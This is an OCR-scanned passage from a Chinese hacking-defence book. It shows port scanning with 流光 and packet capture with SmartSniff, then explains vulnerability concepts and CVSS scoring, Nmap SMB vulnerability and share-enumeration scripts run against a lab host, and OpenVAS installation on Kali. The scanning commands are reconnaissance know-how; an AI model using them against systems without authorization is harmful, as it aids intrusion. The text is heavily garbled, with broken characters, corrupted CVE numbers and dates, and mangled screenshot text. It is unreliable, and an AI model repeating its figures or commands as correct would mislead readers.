框 ， 在 该 对 话 框 的 下 拉 列 表 框 中 输入 要 扫 
描 主 机 的 IP 地 址 (这 里 以 192.168.0.105 为 
例 ) ， 如 下 图 所 示 。 

潜 加 主机 (HTTP) 

192.168.0.10 引 | 

因 自动 更 新 主机 列表 (R) 四 使 用 自动 充 成 功能 多 
确定 (0) | 


此 时 ， 在 主 窗口 中 将 显示 出 刚刚 添加 

的 HTTP 主 机 ， 右 击 此 主机 ， 在 弹出 的 快捷 

菜单 中 依次 选择 “探测 ”一 “扫描 主机 端 
口 ” 菜 单 命令 ， 如 下 图 所 示 。 


二 小 恰 软 件 - [流光 5.0】 Build 3310 (0 忆 户 ) = -日 黄 
文件 (月 ” 汤 守 (E) 矢志 [(V) 菏 则 (R) 还 及 (QJ 工 吕 (TMT 和 寻 动 [H] 苇子 (A) 


”取消 CC) | 


口角 PROXY 主 编辑 


》 扫 插 主机 某 口 … 局 
检测 主机 类 型 。 
摊 则 用 户 信息 (Fingcn,。 

Sun Solaris 用 广 列 记 (Finger)... 


lans FTP 验 让 用/ 


国清 相 欢 件 
赤 台 


打开 “端口 探测 设置 ”对 话 框 ， 在 该 
eg ap 
选 框 ， 然 后 在 “范围 ”选项 区 中 设置 要 探 
测 端 口 的 范围 ， 如 下 图 所 示 。 
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乱 口 探 剂 设置 单 击 摆 面 上 的 SmartSniff 程 序 图 标 ， 
一 区 I AB: 打开 SmartSniff 程 序 主 窗 口 ， 如 下 图 所 示 。 


探 出 端口 范围 从 : |100 到 |soo0 BR smartSniff 一 口 xX 
文件 (F) ”编辑 (E) ”视图 (V) 选项 (0O) ”帮助 (H) 


索引 协议 本 地 地 址 远程 地 址 本 地 端口 远程 端口 


step 加 设置 完成 后 ， 单 击 “ 确 定 ” 按 钮 ， 开 
enh pd edge atet 


图 小 怕 软 件 - [流光 5.0】 Build 3310 (0 有 局 户 ) 
文件 (日 ” 编 赎 (E) 查 去 [(V) 到 调 (R) 和 运 大 (0) 工具 人 帮助 (H】 关于 (A) 
挥 吊 忆 录 得 匠 : | 
-… 口 伟 FTP 主机 ~ 
了 加 名 HTTP 主机 
ew | N92. 158.0, 105 
- 口 紧 FROMNKY 主 机 
口红 roaw 主机 
;一口 训 wssat 主机 
日 1 口 要 纱 助 主机 
二 口 量 SP 三 机 


IFRCS 王 机 
-D 斯 名 于 由 或 方 康 
口 DY¥ 探 利 历 史 岂 了 录 
- 口 @ 192.158.0,105 v 


a | 系 纺 睛 本 | 类 


单 击 “开始 捕捉 ”按钮 或 按 F5 键 ， 开 
rr 各 服务 器 之 间 传 输 的 
区 全 1995 2002 小 和 作品 可 数据 包 , sw 下 图 所 示 修 。o 


用 户 名 1 
BR smartSniff 一 口 X 
文件 (F) ”编辑 (E) 视图 (V) 选项 (0) 帮助 (H) 
1 用 户 单 癌 aD 探测 建 度 | 国 时 
索引 协议 本 地 地 址 远程 地 址 本 地 兰 口 远程 端口 人 ^ 
扫描 完毕 所， 将 会 自动 弹出 “探测 结 9 1 UDP 192.168.0.105 123.151.78.54 4022 8000 
. 92 TCP 192.168.0.105 125.88.219.247 3255 443 
果 ” 对 话 框 ， 如 果 目 标 主 机 存 在 开放 端 吕 ， 93 TCp 192.168.0.105 180.149.131.35 3388 443 
让 从 在 该 对 > 辟 示 中。 二 94 Tcp 192.168.0.105 180.149.131.35 3389 443 
就 会 在 该 二话 杠 中 显示 出 米 ， 如 下 图 所 示 。 5 TCP 192.168.0.105 125.77.198.152 53891 80 v 
抒 泡 结 里 


开放 端口 : 


主机 192.158.0.105 端 口 0080.… 开 启 (PROXY). 
主机 192. 二 8.0.105 端 口 0080.… 开 启 (HTTP)， 


已 经 捕获 27 个 数据 包 


单 击 “停止 捕获 ”按钮 或 按 F6 键 ， 停 
止 捕获 数据 ， 在 列表 中 选择 任意 一 个 TCP 类 
EN 型 的 数据 包 ， 即 可 查看 其 数据 信息 ， 如 下 


图 所 示 。 
人 实战 壮 你 2 捕 获 网 络 中 的 TC Pp/l P 数 rg 视图 (V) ”选项 (O) 帮助 [H) 


9 本 地 池 址 远程 雹 让 
人 192.168.0.106 192.163.0.255 DESKTOP-SCVE... 
目 9J 和 站 上 用 户 捕 获 日 o 192.168.0.105 183.60.16.208 DESKTOP-67NQ... 
S mart S nl ffL 口 以 . | 192.168.0.105 119.147.201.44 DESKTOP-67NOQ... 
、 » 、 SC 192.168.0.105 125.76.247.199 DESKTOP-67NQ... 
的 网 络 适 配套 的 TCP/IP 数 据 包 > 并 且 可 以 192.168.0.105 “125.76.247.199 DESKTOp-67NQ_. 
192.168.0.105 61.128.114.134 5 53 DESKTOP-67NQ.,.. 


按 顺 序 查 看 客户 端 与 服务 器 之 间 会 话 的 数 192.168.0.105 120.55.88.244 3511 DESKTOP-57NOA... 
据 。 用 户 可 以 使 用 ASCII 模 式 〈 用 于 基于 looooo on or or 00 00 0 0 0 00 00 00077 77 7 0 


BID 8 77 65 68 61 HD 6D 65 72 B22 63 6E GH G0 1 a0 -Wehamme 上 -cn 


文本 的 协议 ， 如 HTTP、 SMTP 、 POP3 与 89666629 61 


FTP) 、 十 六 进 制 模式 来 查看 TCP/IP 会 话 jwawre 977 65 6806160 6065 72 006365 09000m 00 venom renv 
(用 于 基于 非 文 本 的 协议 ， 如 DNS ) 。 ez4AIcpnesEEGIT 

利用 SmartSniff 捕 获 TCP/IP 数 据 包 的 具 在 列表 中 选择 任意 一 个 UDP 类 型 的 数 
体操 作 步 又 如 下 : 据 包 ， 即 可 查看 其 数据 信息 ， 如 下 图 所 示 。 


200 


ER smartsniff 一 口 x 

文件 (Pi 编辑 (E) 视图 (V) 和 这 项 (O) 帮助 (H) 

> 办 | 口 加 名 包 站 
本 地 地 址 远程 地 址 
192.168.0.106 192.168.0.255 

183.60.16.208 

192.168.0.105 119.147.201.44 5001 
192.168.0.105 125.76.247.199 3421 


DESKTOP-5CVE... 
DESKTOP-67NO.,., 
DESKTOP-67NQ... 
DESKTOP-67NQ... 
DESKTOP-67NQ... 
DESKTOP-67NQ... 
DESKTOP-67NQ... 


192.168.0.105 125.76.247.199 3423 
192.168.0.105 61.128.114.134 60524 
192.168.0.105 120.55.88.244 3511 


B888868886 62 683 686 689 B86 48 13 89 A 08 66 66 33 ED 61 66 
Bebeboote 66 91 E3 34 E2 39 BB 56 BS 4#B BS8 8A 58 60 45 85 
68680026 DB 66 BB 39 DD EF BE 8C Fé nn BEG BD h7 C2 GC 99 = 下 -和 


B8888838 A9 1B 24 EB MD hF 61 59 72 16 1E 9F 9 1D hh 68 二 
BBbbnnnun CD DG E6 DS BD C6 BA 77 96 5F A3 10 69 nu B85 hh  ------- MW 5 
888086886858 11 BA 63 = 
< > 


息 共 44 个 TCP/IP 会 话 ,已 远 硅 1 个 


在 列表 中 选中 任意 一 个 数据 包 ， 单 击 
“文件 ”一 “属性 ”菜单 命令 ， 在 弹出 的 
“属性 ”对 话 框 中 可 以 查看 其 属性 信息 ， 
如 下 图 所 示 。 

2 


索引 : 8 | 
协议 : [UDP | 


本 地 地 址 : 。 [|192.168.0.105 
远程 地 址 : |183.60.16.208 | 
本 地 端口 : 15000 
远程 端口 : 
本 地 主机 : IDESKTOP-67NQBIF.DHCP HOST | 
远程 主机 | 
服务 名 称 : | 
包 : lz | 
数据 大 小 : [元 训 于 ] 
总 大 小 : l293 字 节 | 
数据 坏事 : KB 种 | 
捕获 时 间 : |l20171811518:39:29:856 | 


最 后 包 体 时 间 : |2017/8115 18:39:29:966 | 
进程 ID: | 


进程 文件 名 | | 
进程 用 户 : | | 
加 载 MAC 地 址 : | | 
远程 MAC 地 址 : | |] 
本 地 1IP 国 穿 : 

远程 IP 国 家 :| |] 
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在 列表 中 选中 任意 一 个 数据 包 ， 单 击 

“视图 ”一 “网 页 报告 -TCP/IP 数 据 流 ” 命 
令 ， 即 可 以 网 页 形式 查看 数据 流 报告 ， 如 
下 图 所 示 。 


DS 中 数据 流 报告 x | 本， ID 人 加 
C0) 合 加 file:/DY360 安 全 浏 有 ~ 。 吉 此 接 误 避 上 口 今 ， 三 
> 育 收 塌 、 口 手 H 枚 苞 夫 口 谷 歌 国 网 址 大 全 》 加 民 .X%- 记 网 .四 怠 


数据 流 报告 


| 索引 | 把 

| 协议 [ue 

| 本 地 地 址 。 | 192. 168.0. 105 

| 远 杠 地址 。 ||61. 128. 114. 134 
[ED 

| 本 地 主机 |pasrrmop-a7ioPIF， DHCE HOST 
| 远程 主机 dns. xj. telecom com 


苗 今日 优选 @) 今日 百 捷 ”上 旺 ] 也 点 新 闻 内 娄 加 于 名 下 载 巴 & 口 Q 100%  : 


11.4 小 试 身 手 

扫描 主机 的 各 种 端口 。 
扫描 主机 的 Banner 信 息 。 
扫描 主机 的 常见 协议 。 
探测 主机 的 防火 墙 。 


练习 1: 
练习 2: 
练习 3: 
练习 4: 
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第 12 草 ”无 线 网 络 中 主机 漏洞 的 
安全 防护 


漏洞 是 在 硬件 、 软 件 、 协 议 的 具体 实现 或 系统 安全 策略 上 存在 缺陷 ， 从 而 可 以 使 攻 
击 者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。 本 章 介 绍 如 何 对 无 线 网 络 中 的 主机 进行 漏洞 


扫描 ， 主 要 包括 系统 漏洞 概述 、 系 统 漏洞 评分 标准 


CVSS、 使 用 Nmap 扫 描 漏 洞 、 使 用 


OpenVAS 扫 描 漏 洞 、 使 用 Nessus 扫 描 漏洞 、 系 统 漏洞 的 安全 防护 等 。 


计算 机 系统 漏洞 也 被 称 为 系统 安全 和 缺 
陷 。 这 些 安全 缺陷 会 被 技术 高 低 不 等 的 入 
侵 者 所 利用 并 达到 控制 目标 主机 或 造成 一 
些 更 具 破 坏 性 的 目的 。 


12.1.1 系统 漏洞 的 定义 


系统 漏洞 是 指 应 用 软件 或 操作 系统 软 
件 在 逻辑 设计 上 的 缺陷 ， 或 在 编写 时 产 
生 的 错误 ， 茶 个 程序 〈 包 括 操作 系统 ) 


a 并 铺 8 图 在 设计 时 未 考虑 周全 ， 则 这 个 缺陷 或 错误 


"a ; ! 
ee 
zr Tt 


向 将 可 能 被 不 法 者 或 黑客 利用 ， 通 过 植 入 病 


毒 等 方式 来 攻击 或 控制 整个 计算 机 ， 从 而 
锅 取 计算 机 中 的 重要 资料 和 信息 ， 其 至 破 
坏 系 统 。 

系统 漏洞 又 称 安全 缺陷 ， 可 对 用 户 造 
成 不 展 后 果 。 如 系统 漏洞 被 恶意 用 户 利用 ， 
会 造成 信息 泄露 ， 黑客 攻 击 网 站 即 利用 网 络 
服务 器 操作 系统 的 漏洞， 对 用 户 操 作 造 成 不 
便 ， 如 人 不明 原因 的 死机 和 丢失 文件 等 。 


12.1.2 ”系统 漏洞 产生 的 原因 


系统 漏洞 的 产生 不 是 安装 不 当 的 结 
果 ， 也 不 是 使 用 后 的 结果 ， 它 受 编程 人 员 
的 能 力 、 经 验 和 当时 安全 技术 所 限 ， 在 程 
序 中 难免 会 有 不 足 之 处 。 

归结 起 来 ， 系 统 漏 洞 产 生 的 原因 主要 
有 以 下 几 扣 : 


(1) 人 为 因素 。 编 程 人 员 在 编写 程序 
过 程 中 故意 在 程序 代码 的 隐蔽 位 置 保留 了 
后 门 。 

(2) 人 硬件 因素 。 因 为 便 件 的 原因 ， 编 
程 人 员 无 法 弥补 硬件 的 漏洞 ， 从 而 使 硬件 
问题 通过 软件 表现 出 来 。 

(3) 客观 因素 。 受 编程 人 员 的 能 力 、 
经 验 和 当时 的 安全 技术 及 加 密 方 法 所 限 ， 
在 程序 中 不 免 存在 不 足 之 处 ， 而 这 些 不 足 
恰恰 会 导致 系统 漏洞 的 产生 。 


系统 漏洞 评分 标准 一 一 
CVSS 


12.2 


通用 弱点 评价 体系 (CVSS) 是 由 
NIAC 开 发 、FIRST 维 护 的 一 个 开放 并 且 能 
够 被 产品 厂商 免费 采用 的 标准 。 利 用 该 标 
准 ， 可 以 对 弱点 进行 评分 ， 进 而 帮助 我 们 
判断 修复 不 同 弱点 的 优先 等 级 。 


12.2.1 CV99 简 介 


CVSS (Common Vulnerability Scoring 
System 通用 漏洞 评分 系统 ) 是 一 个 行业 公 
开标 准 。 可 以 帮助 人 们 建立 衡量 漏洞 严重 
程度 的 标准 ， 使 得 人 们 可 以 比较 漏洞 的 严 
重 程度 ， 从 而 确定 处 理 它 们 的 优先 级 。 

CVSS 得 分 基于 一 系列 维度 上 的 测量 
结果 ， 这 些 测量 维度 被 称 为 量度 (Met- 


rics) 。 漏 洞 的 最 终 得 分 最 大 为 10， 最 小 为 
0。 得 分 在 7 一 10 中 的 漏洞 是 高 危 漏 洞 通常 
被 认为 比较 严重 ， 得 分 在 4 一 6.9 中 的 是 中 级 
漏洞 ， 得 分 在 0 一 3.9 中 的 则 是 低级 漏洞 。 

CVSS 系 统 包括 三 种 类 型 的 分 数 : 基本 
分 、 暂 时 分 和 环境 分 。 其 中 ， 基 本 分 和 和 暂 
时 分 通常 由 安全 产品 卖主 、 供 应 商 给 出 ， 
因为 他 们 能 够 更 加 清楚 地 了 解 漏洞 的 详细 
信息 ; 环境 分 通常 由 用 户 给 出 ， 因 为 他 们 
能 够 在 自己 的 使 用 环境 下 更 好 地 评价 该 漏 
洞 存 在 的 潜在 影 啊 。 


12.2.2 CVSS 计 算 方法 


CVSS 有 上 自己 的 一 套 漏洞 评分 计算 方 
法 ,但 也 有 一 些 指标 具有 不 确定 性 和 复杂 
性 ， 会 导致 完全 的 定量 分 析 困 难 。 它 采用 3 
个 客观 性 指标 和 11 个 主观 性 指标 。 


1. 基本 评价 


基本 评价 指 的 是 该 漏洞 本 喘 固 有 的 一 
些 特点 ， 及 这 些 特 点 可 能 造成 的 影响 评价 
分 值 。 

(1) 攻击 途径 (AccessVector) 。 如 果 
是 本 地 攻击 给 0.7， 可 以 远程 攻击 给 1.0。 

(2) 攻击 复杂 度 (AccessComplexity) 。 
分 为 3 个 标准 分 别 是 低 、 中、 高 ， 给 出 的 
分 值 为 0.6、0.8、1.0。 

(3) 认证 (Authentication)〉。 需 要 认证 
给 0.6， 不 需要 认证 给 1.0。 

(4) 机 密 性 (ConfImpact) 。 不 受 影响 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 

(5) 完整 性 (IntegImpact) 。 不 受 影响 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 

(6) 可 用 性 (AvailImpact) 。 不 受 影响 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 


2. 生命 周期 评价 


生命 周期 评价 是 针对 最 新 类 型 漏洞 
(如 0day 漏 洞 ) 设置 的 评分 项 ， 因 此 SQL 注 
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入 漏洞 不 用 考虑 。 这 里 列举 出 了 3 个 与 时 间 
紧密 关联 的 要 素 ， 具 体 介 绍 如 下 : 

(1) 可 利用 性 。 未 证 明 0.85， 概 念 证 
明 0.9， 功 能 性 0.95， 完 全 代码 1.0。 

(2) 修复 措施 。 官 方 补 丁 0.87， 临 时 
补丁 0.9， 临 时 解决 方案 0.95， 无 措施 1.0。 

(3) 确认 程度 。 不 确认 0.9， 未 经 确认 
0.95， 已 确认 1.0。 


3. 环境 评价 


每 个 漏洞 会 造成 的 影响 大 小 都 与 用 户 
自身 的 实际 环境 密 不 可 分 ， 因 此 可 选项 中 
也 包括 了 环境 评价 。 可 以 由 用 户 自 评 。 

(1) 危害 影响 程度 。 无 0.0， 低 0.1， 
中 0.3， 高 0.5。 

(2) 目标 分 布 范围 。 无 0.0， 低 0.25， 
中 0.75， 高 1.0 (0、1% 一 15%、16% 一 
49%、50% ~ 100%) 。 

评分 与 危险 等 级 对 应 如 下 : 

e [0，4): 被 认为 是 低级 威胁 。 

e [4，7): 被 认为 是 中 级 威胁 。 

e [7，10]: 被 认为 是 高 级 威胁 。 

不 同 机 构 按 照 CVSS 分 值 定义 威胁 
的 低 、 中 、 高 级 别 ，CVSS 体 现 漏洞 的 风 
险 ， 威 胁 级 别 表 示 漏 洞 风 险 对 系统 的 影响 
程度 ，CVSS 分 值 是 工业 标准 ， 威 胁 级 别 
不 是 。 


12.3 ”使 用 Nmap 扫 描 漏 洞 


Nmap 自 带 有 大 量 脚 本 ， 通 过 脚本 配置 
规则 ， 并 配合 进行 漏洞 扫描 。 
12.3.1 脚本 管理 
Nmap 有 一 个 脚本 数据 库 文件 ， 使 用 该 
数据 库 可 以 对 所 有 的 脚本 进行 分 类 管理 。 
查看 脚本 数据 库 文 件 的 方法 为 : 在 usr/share/ 


Nmap/scripts 目 录 中 有 一 个 script.db 文 件 。 
该 文件 用 于 维护 Nmap 所 有 脚本 文件 ， 在 
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二， 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


Kali Linux 命 令 执 行 窗 口中 输入 cat scriptdb 命 令 ， 即 可 得 看 数据 库 内 容 ， 执 行 效 果 如 下 
所 示 。 


root@kali:/usr/share/nmap/scripts# cat Script.db 
Entry { filename = "acarsd-info.nse", categories = { "discovery", "safe", } } 
Entry { filename = "address-info.nse", categories = { "default", "safe", } } 
Entry { filename = "afp-brute.nse", categories = { "brute", "intrusive", } } 
kt { filename = "afp-ls.nse", categories = { "discovery", "safe", } } 
ntry { filename = "afp-path-vuln.nse", categories = { "exploit", "intrusive", "vuln", } } 
Entry { filename = "afp-serverinfo.nse", categories = { "default", "discovery", "safe", } } 
Entry { filename = "afp-shownount.nse", categories = { "discovery", "safe", } } 
Entry { filename = "ajp-auth.nse", categories = { "auth", "default", "safe", } } 
Entry { filename = "ajp-brute.nse", categories = { "brute", "intrusive", } } 
Entry { filename = "ajp-headers.nse", categories = { "discovery", "safe", } } 


每 一 个 脚本 后 面 都 有 一 个 分 类 (categories) 信息 ， 分 别 是 默认 (default) 、 发 现 
(discovery) 、 安 全 (safe) 、 暴 力 (brute) 、 入 侵 (intrusive) 、 外 部 的 (external) 、 
漏洞 检测 〈(vun) 、 漏 洞 利用 〈exploit) 。 

另外 ， 如 果 执 行 less script.db | wc -] 命 令 ， 可 以 得 看 到 目前 Nmap 有 588 个 脚本 ， 如 下 图 
所 示 。 


sh less script.db | wc -1 


网 提示 : 如 果 用 于 检测 ， 尽 量 挑选 safe 字 段 的 脚本 进行 扫描 ， 和 否则 可 能 因为 扫描 导致 目标 
主机 系统 不 稳定 。 


12.3.2 ” 扫 折 壮 示 


使 用 Nmap 的 脚本 文件 ， 可 以 扫描 系统 漏洞 ， 下面 以 smb-vuln-ms10-061.nse 脚 本 为 
例 ， 来 介 绍 使 用 Nmap 进 行 漏洞 扫描 的 方法 ，smb-vuln-ms10-061 是 Stuxnet 旺 虫 病毒 利用 的 
4 个 漏洞 之 一 ， 该 漏洞 是 由 于 Print Spooler 权 限 配置 不 当 造 成 的 ， 这 个 漏洞 可 使 打印 请 求 在 
系统 目录 下 创建 文件 、 执 行 任意 代码 等 。 

使 用 Nmap 扫 摘 漏 洞 的 操作 步骤 如 下 : 

使 用 less script.db | grep smb-vuln 命 令 。 筛 选 出 符合 标准 的 脚本 文件 ， 执 行 效果 如 下 
图 所 示 。 


Foot@kali:/usr/share/nmap/scripts# less script.db | grep smb-vultln 

Entry { filename = "smb-vuln-conficker.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 
Entry { filename = "smb-vuln-cve-29017-7494.nNnse", categories = { "intrusive", "vuln", +} } 

Entry { filename = "smb-vuln-cve2009-3103.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 
Entry { filename = "smb-vuln-ms06-025.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 
Entry { filename = "smb-vuln-ms0Q7-029.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 
Entry { filename = "smb-vuln-ms08-067.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 
Entry { filename = "smb-vuln-ms106-054.nse", categories = { "dos", "intrusive", "vuln", } } 

Entry { filename = "smb-vuln-ms16-06]1.nse", categories = { "intrusive", "vuln", } } 

Entry { filename = "smb-vuln-ms17-01g.nse", categories = { "safe", "vuln", } } 

Entry { filename = "smb-vuln-regsvc-dos.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 


使 用 cat smb-vuln-ms10-061.nse 命 令 。 查 看 该 脚本 的 帮助 信息 ， 执 行 效果 如 下 图 所 
示 ， 可 以 看 到 CVSS 评 分 达到 了 9.3 分 ， 因 此 这 个 漏洞 是 一 个 高 危 漏洞 。 


Host script results: 
| smb-vuln-ms19-B661: 
| VULNERABLE : 
Print Spooler Service Impersonation Vulnerability 
State: VULNERABLE 


| 

| 

| IDs: CVE:CVE-20190-2729 

| Risk factor: HIGH CVYSSv2: 9.3 [HIGH) (AV:N/AC:M/AU:N/C:C/I:C/A:C) 

| Description: 

| The Print Spooler service In Microsoft Windows XP,Server 2003 SP2,Vista,Server 2008，and 7, when printer sharing is enabled, 
| does not properly validate spooler access permissions, which allows remote attackers to create files in a system directory, 
| and consequenttLy execute arbitrary code, by sending a crafted print request over RPC, as exploited in the wild in September 2810, 
| aka "Print Spooler Service Impersonation Vulnerability." 

| 

| 

| 

| 

| 


Disclosure date: 2016-09-5 
References: 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2729 
http://technet.microsoft.com/en-us/security/bulletin/MS16-961 
| http://blogs.technet.com/b/srd/archive/28010/89/14/ms10-061-printer-spooler-vulnerability.aspx 
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如 果 通 过 smb-vuln-ms10-061.nse 脚 本 没有 发 现任 何 漏洞 。 还 可 以 尝试 使 用 smb-enum- 
el 该 脚本 会 对 目标 主机 进行 枚 举 ， 发 现 所 有 可 能 存在 的 共享 。 使 用 less 
script.db | grep smb-enum 命 令 ， 筛 选 出 该 脚本 文件 ， 执 行 效果 如 下 图 所 示 。 


root@kali:/usr/share/nmap/scripts# less script.db | grep smb-enum 

Entry { filename = "smb-enum-domains.nse", categories = { "discovery", "intrusive", } } 

Entry { filename = "smb-enum-groups.nse", categories = { "discovery", "intrusive", } } 

Entry { filename = "smb-enum-processes.nse", categories = { "discovery", "intrusive", } } 

Entry { filename = "smb-enum-services.nse", categories = { "discovery", "intrusive", "safe", } } 
Entry { filename = "smb-enum-sessions.nse", categories = { "discovery", "intrusive", } } 

Entry { filename = "smb-enum-shares.nse", categories = { "discovery", "intrusive", } } 

Entry { filename = "smb-enum-users.nse", categories = { "auth", "intrusive", } } 


使 用 Nmap -p445 192.168.1.105 --script=smb-enum-shares.nse 命 令 。 可 以 发 现 通过 枚 举 
脚本 发 现 目 标 机 器 开放 445 端 口 ， 执 行 效果 如 下 图 所 示 。 


root@kali:/usr/share/nmap/scripts# nmap -p445 192.168.1.105 --script=smb-enum-shares.nse 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-29 05:35 EDT 
Nmap scan report for 192.168.1.165 

Host is up (0.060046s Latency) . 


PORT STATE SERVICE 
445/tcp open microsoft-ds 
MAC Address: O00:0C:29:FA:DD:2A (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 6.55 seconds 


使 用 Nmap -p 445 192.168.1.105 --script=smb-vuln-ms10-061 命 令 。 扫 描 主 机 发 现 并 不 
存在 该 汤 洞 。 这 个 现象 在 汤 洞 扫描 中 也 很 正常 ， 并 不 是 所 有 开放 端口 的 机 器 都 存在 汤 洞 ， 
执行 效果 如 下 图 所 示 。 


root@kali:/usr/share/nmap/scripts# nmap -p 445 192.168.1.105 --script=smb-vuln-ms10-06] 
starting Nmap 7.76 ( https://nmap.org ) at 2018-10-29 05:46 EDT 
Nmap Scan report for 192.168.1.105 

Host is up (0.060032s latency). 


PORT STATE SERVICE 
445/tcp open microsoft-ds 
MAC Address: 90:0C:29:FA:DD:2A (VMware) 


Host script results: 
|_smb-vuln-ms10-0661: false 


Nmap done: 1 IP address (1 host up) scanned in 0.57 seconds 
root@kali:/usr/share/nmap/scripts# nmap -Pp 445 192.168.1.103 --script=smb-vuln-ms10-061 


12.4 使 用 OpenVAS 扫 描 漏 洞 


OpenVAS (Open Vulnerability Assessment System) 是 一 个 开放 式 漏 洞 评 估 系 统 ， 其 核 a 
心 部 分 是 一 个 服务 器 。 该 服务 器 包括 一 套 网 络 漏洞 测试 程序 ， 可 以 检测 远程 系统 或 应 用 程 
序 中 的 安全 问题 。 


12.4.1 安装 OpenVAS 


默认 情况 下 ，Kali 系 统 并 没有 安装 该 扫描 工具 ， 因 此 想 要 使 用 它 必须 要 先 安装 。 在 
Kali 系 统 中 安装 OpenVAS 的 操作 步骤 如 下 : 
在 Kali Linux 系 统 的 命令 执行 界面 中 输入 apt-get install openvas 命 令 ， 执 行 效果 如 下 图 
扬 示 。 
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root@kali:~# apt-get install openvas 

正在 读 取 软件 包 列 表 ... 完成 

正在 分 析 软 件 包 的 依赖 关系 树 

正在 读 取 状态 信息 ... 完成 

下 列 软件 包 是 自动 安装 的 并 且 现 在 不 需要 了 : 
Libbind9-160 Libdns1102 Libirs1696 Libisc169 Libisccc160 Libisccfg160 
LibLwres160 libpoppler74 Libprotobuf-Lite1l16 Libprotobuf16 Libradare2-2.9 
Libunbound2 Libx265-166 python-backports.ssl-match-hostname 
python-beautifulsoup python-jwt ruby-terminal-table 
ruby-unicode-display-width 

使 用 'apt autoremove' 来 扼 载 它 (它们 )， 


[step 图 安装 过 程 会 提示 将 要 安装 哪些 库 及 支持 文件 ， 并 给 出 建议 安装 文件 ， 如 下 图 所 示 。 


将 会 同时 安装 下 列 软 件 : 

doc-base fonts-texgyre gnutls-bin greenbone-security-assistant 
greenbone-security-assistant-common libhiredis0.14 liblua5.1-0 
libmicrohttpdl2 Libopenvas9 libradcli4 libuuid-perl libyaml-tiny-perl 
lua-cjson openvas-cli openvas-manager openvas-manager-common openvas-scannen 
preview-latex-style redis-server redis-tools tex-gyre 
texlive-fonts-recommended texlive-latex-extra texlive-latex-recommended 
texlive-pictures texlive-plain-generic tipa 

建议 安装 : 

rarian-compat openvas-client pnscan strobe ruby-redis 
texlive-fonts-recommended-doc icc-profiles libfile-which-perl 
libspreadsheet-parseexcel-perl texlive-latex-extra-doc 
texlive-latex-recommended-doc texlive-pstricks dot2tex prerex ruby-tcltk 
| libtcltk-ruby texlive-pictures-doc vprerex 


stp 图 同时， 在 界面 的 下 面 会 提示 是 否 安装 文件 ， 如 下 图 所 示 。 


下 列 【 新 】 软 件 包 将 被 安装 : 

doc-base fonts-texgyre gnutls-bin greenbone-security-assistant 
greenbone-security-assistant-common libhiredis0.14 liblua5.1-0 
Libmicrohttpd12 libopenvas9 libradcli4 libuuid-perl libyaml-tiny-perl 
lua-cjson openvas openvas-cli openvas-manager openvas-manager-common 
openvas-scanner preview-latex-style redis-server redis-tools tex-gyre 
texlive-fonts-recommended texlive-latex-extra texlive-latex-recommended 
texlive-pictures texlive-plain-generic tipa 

升级 了 9 个 软件 包 ， 新 安装 了 28 个 软件 包 ， 要 逢 载 6 个 软件 包 ， 有 9 个 软件 包 未 被 升级 。 
需要 下 载 85.6 MB 的 归档 。 

解压 缩 后 会 消耗 252 MB 的 额外 空间 。 
您 希望 继续 执行 吗 ? [Y/n] y 


[step 国 如 果 需 要 安装 ， 这 时 可 以 按 Y 键 执行 安装 ， 如 下 图 所 示 。 


openvas -setup 


>] Updating 0penVAS feeds 
=] [1/3] Updating: NVT 
-2918-19-28 21:57:98-- http://dl.greenbone.net/community-nvt-feed-current.tar.bz2 
在 解析 主机 dl.greenbone.net (dl.greenbone.net)... 89.146.224.58，2a691:130:209D:127: :d1 
在 连接 dl.greenbone.net (dl.greenbone.net)|89.146.224.58|:89... 已 连接 。 
发 出 HTTP 请 求 ， 正 在 等 待 回应 ... 2909 OK 
发 度 : 30207248 [29M) [application/octet-stream] 
正在 保存 至 :“/tmp/greenbone-nvt-sync.ULkb7TZ4I3/openvas-feed-2018-10-28-5266.tar.bz2" 


/tmp/greenbone-nvt-sync.UL 100%[======================== 一 ============>] 28.81M 6.65MB/s 用 时 5.7s 


28618-10-28 21:57:16 (5.65 MB/s) - 已 保存 “/tmp/greenbone-nvt-sync.ULkb7TZ4I3/openvas-feed-2918-19-28- 
5266. tar.bz2” [306207248/30297248]) 


step 图 本 心 等 待 安装 完成 。 这 里 会 有 一 个 初始 密码 ， 一 定 要 先 保存 这 个 密码 ， 否 则 无 法 登 
录 系 统 ， 如 下 图 所 示 。 


[FJ Opening Web UI (https://127.0.0.1:9392) in: 5...4...3...2... 工 ..4 


[>] Checking for admin user 

[*] Creating admin user 初始 密码 

User created with password TT 
[+] Done 

由 于 OpenVAS 是 一 个 非常 庞大 的 漏洞 扫描 库 ， 因 此 安装 过 程 中 可 能 会 出 现 文 件 缺 少 
等 错误 ， 这 时 ， 可 以 使 用 openvas-check-setup 命 令 ， 检 查 安 装 是 否 完整 ， 如 下 图 所 示 。 


[Tt seems LiKe your UpenVvAS-9 instaltlation 1s OK. 


If You think it is not 0K, please report your observation 

and help us to improve this check routine: 
nttp://lists.wald.intevation.org/mailman/listinfo/openvas-discuss 
Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem) 


pA 


知 提 示 : 在 检查 安装 结果 中 ， 如 果 看 到 提 
es Eye 如 果 出 现 错 
误 ， 这 给 出 尝试 修复 的 建议 。 


如 果 安 装 完 成 忘记 保存 初始 密码 ， 
通过 openvasmd --get-users 命 令 ， 查 看 
OpenVAS 中 都 有 哪些 用 户 ， 当 然 如 果 是 初次 
安装 只 会 有 一 个 管理 员 账 号 ， 如 下 图 所 示 。 


oot@kali:/usr/share/nmap/scripts# openvasmd Rab 


由 于 OpenVAS 有 是 安全 漏洞 扫描 工 
具 ， 为 了 保证 扫描 的 准确 性 ， 建 议 经 常 
对 软件 进行 升级 ， 这 时 可 以 使 用 Updating 
OpenVAS feeds 命 令 对 OpenVAS 进 行 定期 检 
查 升 级 ， 如 果 存 在 升级 会 自动 进行 更 新 。 
